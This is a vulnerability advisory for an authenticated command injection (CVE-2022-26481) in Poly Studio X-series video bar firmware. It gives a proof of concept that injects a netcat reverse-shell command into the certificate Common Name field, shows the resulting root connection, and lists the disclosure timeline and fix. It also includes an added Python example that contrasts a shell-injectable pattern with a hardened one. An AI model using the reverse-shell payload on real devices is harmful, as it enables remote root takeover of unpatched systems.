               title: Authenticated Command Injection
             product: Poly Studio X30, Studio X50, Studio X70, G7500
  vulnerable version: 3.4.0-292042, 3.5.0-344025, 3.6.0
       fixed version: 3.7.0 or higher
          CVE number: CVE-2022-26481
              impact: critical
               found: 2021-07-14
                  by: Johannes Kruchem (Office Vienna)
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company
                      Europe | Asia | North America



Vendor description:
"Experience full board-room-quality audio, and knock-your-socks-off video,
for mid-sized rooms. The Poly Studio X50 all-in-one video bar is radically
simple to use with support for leading cloud video services built right
in—no PC or Mac required. Voices are crisp and clear. Video feels natural.
And wireless content sharing lets users collaborate from their devices
without cables or pucks."

Business recommendation:
The vendor provides a patch which should be installed immediately.

Vulnerability overview/description:
1) Authenticated Command Injection with Elevated Privileges (CVE-2022-26481)
An authenticated Command Injection vulnerability exists in the web interface when
creating a certificate. An attacker is able to execute commands with root privileges.

Proof of concept:
1) Authenticated Command Injection with Elevated Privileges (CVE-2022-26481)
As an authenticated user:

1. In the system web interface, go to Security > Certificates.
2. Select Create Certificate Signing Request (CSR).
3. In the Certificate Details form, complete the following fields:

Common Name (CN): $(busybox nc 8888 -e /system/bin/sh)

(steps taken from

The previously started nc listener receives a connection from the camera
as root:

$ nc -lvp 8888
connect to [] from (UNKNOWN) []
$ pwd
$ whoami
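
Added example (not part of the original advisory and not the vendor's code): the class of flaw behind the Common Name field, next to a hardened form. The advisory does not name the firmware's CSR helper, so TOOL is a hypothetical stand-in that echoes its argument, and the probe value is a constructed, harmless command substitution.

```python
import re
import shlex
import subprocess
import sys

# Hypothetical stand-in for the firmware's CSR helper, which the advisory does
# not name: it echoes the subject argument it receives.
TOOL = [sys.executable, "-c", "import sys; print(sys.argv[1])"]

# Allowlist: DNS host name with an optional leading wildcard label.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
CN_RE = re.compile(rf"(?:\*\.)?{LABEL}(?:\.{LABEL})*")
MAX_CN_LEN = 64  # X.520 upper bound for commonName


def csr_subject_vulnerable(cn: str) -> str:
    """Flawed pattern: the form field lands in a string parsed by /bin/sh."""
    cmd = shlex.join(TOOL) + f' "/CN={cn}"'
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def run_without_shell(subject: str) -> str:
    """The subject is a single argv element; no shell ever parses it."""
    out = subprocess.run(TOOL + [subject], capture_output=True, text=True,
                         check=True)
    return out.stdout.strip()


def validate_cn(cn: str) -> str:
    """Reject anything that is not a plain host name before it goes further."""
    if len(cn) > MAX_CN_LEN or not CN_RE.fullmatch(cn):
        raise ValueError("Common Name must be a valid host name")
    return cn


def csr_subject_hardened(cn: str) -> str:
    """Defence in depth: allowlist validation plus shell-free execution."""
    return run_without_shell("/CN=" + validate_cn(cn))


if __name__ == "__main__":
    probe = "$(echo INJECTED)"  # constructed, harmless command substitution
    print(csr_subject_vulnerable(probe))      # shell expands the substitution
    print(run_without_shell("/CN=" + probe))  # value stays literal
    print(csr_subject_hardened("studio-x50.example.com"))
```

Either control alone blocks the probe; using both means a gap in the allowlist still does not reach a shell.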

Vulnerable / tested versions:
At least the following firmware versions of Poly Studio X30, Studio X50, Studio X70 and
G7500 are affected:

- 3.4.0
- 3.5.0
- 3.6.0

Vendor contact timeline:
2021-07-14: Contacting vendor through PSIRT email.
2021-07-15: Vendor sent PGP key.
2021-07-16: Advisory was sent to the vendor.
2021-07 to 2022-03: Further coordination with multiple emails and meetings.
2022-03-18: Vendor provides draft advisory.
2022-03 to 2022-06: Patch already available, waiting for vendor advisory release.
2022-06-01: Coordinated release of security advisory.

Solution:
Update to firmware version 3.7.0 or higher.

The firmware can be downloaded from the vendor's support page:

This issue has been documented in the vendor's security advisory PLYTV21-09:

Workaround:
In order to minimize the risk of exploitation, set a strong password for the
web interface and restrict network access to the device.